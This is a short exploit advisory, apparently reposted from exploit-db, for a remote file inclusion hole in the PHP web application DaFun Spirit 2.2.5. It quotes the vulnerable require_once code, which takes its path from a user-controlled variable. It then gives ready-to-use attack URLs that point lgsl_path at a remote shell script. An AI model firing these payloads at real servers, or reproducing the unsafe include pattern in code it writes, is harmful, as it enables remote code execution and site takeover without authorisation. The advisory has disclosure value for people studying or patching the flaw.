DaFun Spirit 2.2.5 – Multiple Remote File Inclusions - 体验盒子

作者： 2010-03-26

日期： 2010-03-26

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/11888/

\\\|///
\\- -//
 (@ @ )
----oOOo--(_)-oOOo--------------------------------------------------
DaFun Spirit 2.2.5 Multiple Remote File Include Vulnerability
Script: http://code.google.com/p/dafunspirit/downloads/list
Author: mat
Mail: rahmat_punk@hotmail.com
---------------Ooooo------------------------------------------------
 ( )
ooooO ) /
( )(_/
 \ (
\_)

Vuln Code

//-----------------------------------------------------------------------------------------------------------+

$lgsl_path = ""; // RELATIVE PATH BETWEEN THIS FILE AND THE LGSL FOLDER FOR PAGE INTEGRATION

//-----------------------------------------------------------------------------------------------------------+

require_once($lgsl_path."lgsl_protocol.php");

$get_ip = $_GET[ip];
$get_port = $_GET[port];

//-----------------------------------------------------------------------------------------------------------+

Usage: http://[target]/[path]/modules/dfss/lgsl/lgsl_players.php?lgsl_path=http://[shellscript]
 http://[target]/[path]/modules/dfss/lgsl/lgsl_settings.php?lgsl_path=http://[shellscript]


Greetings: All Hackerz